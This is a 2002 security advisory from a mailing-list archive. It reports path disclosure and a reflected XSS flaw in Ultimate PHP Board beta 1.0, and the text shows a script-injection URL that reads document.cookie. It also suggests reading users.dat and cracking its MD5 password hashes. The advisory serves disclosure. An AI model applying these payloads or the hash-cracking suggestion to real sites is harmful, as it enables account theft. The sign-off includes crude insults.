[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS and Path Disclosure in UPB



=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: XSS and Path Disclosure in UPB
product: Ultimate PHP Board (UPB) final beta 1.0 
vendor: http://www.webrc.ca/php/upb.php
risk: middle
date: 12/7/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url: http://f0kp.iplus.ru/bz/009.txt 
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
	      
description
-----------

1) when calling add.php, which comming with upb, it output some
error message, that contain foloving information:

================================================================
Warning: Failed opening 'textdb_v2.inc.php' for inclusion 
(include_path='.:/usr/local/lib/php') in 
/home/samcom/public_html/public/messageboard2/add.php on line 5
attempting to edit record...

Fatal error: Call to undefined function: format_field() in 
/home/samcom/public_html/public/messageboard2/add.php on line 11
================================================================

as you can see, script output contain full physical path of the
board. 

2). but if user has deleted this file (add.php) u can to view 
the full path in this way: 

==============================================================
http://hostname.com/phorum/viewtopic.php?id=some_shit&t_id=2
==============================================================

cos the `id' parameter doesnt check if input data has entered
correctly, then it output folloving error message: 

===================--======= snip =============================
Warning: Unable to access ./data_dir/some_shit.dat in 
/home/samcom/public_html/public/messageboard2/textdb.inc.php on 
line 240

..

Warning: Supplied argument is not a valid File-Handle resource 
in /home/samcom/public_html/public/messageboard2/textdb.inc.php 
on line 241

..
=========================== snip ==============================

where `data_dir' is the name of directory, where stored important
files, eg users.dat with users passwords (md5). in default name 
of this directory is `db'. 

if user doesnt make this dir secure, then you can to get the users
passwds with reading file users.dat (default name.. but it is an 
old stuff) and cracking the .md5 hashes. 
 
3) cos the above, file viewtopic.php doesnt check at all, the you
can insert some html in scripts output:  

========================================================
http://hostname.com/phorum/viewtopic.php?id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&t_id=2
========================================================

[it must be in a single string]

not URL-encoded string working fine also.
ps. all of this issues applied to previus versions upb.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all 
russian security guyz!! and kate for she is kewl girl )) 
fuck_off: slavomira and other dirty ppl in *.kz

================
im not a lame,
not yet a hacker
================